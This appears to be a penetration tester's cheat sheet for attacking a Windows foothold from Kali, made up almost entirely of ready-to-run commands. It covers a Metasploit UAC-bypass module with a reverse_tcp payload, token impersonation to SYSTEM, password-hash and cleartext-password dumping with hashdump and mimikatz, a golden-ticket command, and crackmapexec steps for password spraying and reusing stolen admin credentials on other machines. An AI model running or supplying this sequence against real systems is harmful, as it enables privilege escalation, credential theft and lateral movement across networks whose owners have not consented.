From Kali -> Foothold Windows
UAC bypass
meterpreter > use exploit/windows/local/bypassuac_injection_winsxs
meterpreter > set payload windows/x64/meterpreter/reverse_tcp
meterpreter > set target Windows x64
meterpreter > set SESSION 1
meterpreter > run
# Successfully escalated privileges
# Received a new meterpreter session
Getting privileges of current user
meterpreter > getprivs
Getting UID
meterpreter > getuid
meterpreter > load incognito
List tokens
meterpreter > list_tokens -u
Delegation Tokens Available
======
... (token name)
... (token name)
Impersonate token
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" (token name)
# UID changed, can check with "getuid"
Dumping hashes (once escalated to admin privileges)
meterpreter > hashdump
Load mimikatz
meterpreter > load kiwi
Dumping secrets from LSA (or utilizing LSA)
meterpreter > lsa_dump_s (tab-complete to list commands starting with "lsa_dump_s")
Dumping clear text password
meterpreter > lsa_dump_secrets
# Received a big part of text with clear text password
meterpreter > shell (switch to a cmd shell)
---
auxiliary/scanner/rdp/rdp_scanner
---
mimikatz # privilege::debug (check privileges, requires admin)
mimikatz # lsadump::lsa /patch
Enumerate logon passwords on older Windows versions
mimikatz # sekurlsa::logon
mimikatz # lsadump (dump content of the SAM DB)
The "/patch" option, for when an error is encountered
The "/inject" option
The "/name:[name|krbtgt]" option
Create a golden ticket
mimikatz # kerberos::golden /user: /domain: /sid: /krbtgt: /id:
---
mimikatz # sekurlsa::sam -> NTLM hashes (meterpreter -> hashdump, lsa_dump_sam, lsa_dump_secrets)
mimikatz # sekurlsa::logonpasswords
---
Use credential collector meterpreter module
meterpreter > use post/windows/gather/credentials/credential_collector
wce64.exe tool (Windows Credential Editor)
---
crackmapexec
- environment/network scan
- smb null scan
- domain users scan
*** when a first account with creds has been obtained
- pass pol scan (facilitates password spraying, brute force)
- shares scan (check readable/writable resources)
*** when an admin account is available
--loggedon-users scan
--lsa
--sam
-d . means the local domain
*** once SAM admin, try the same creds on other machines on the same network
- try on each other server to get more accounts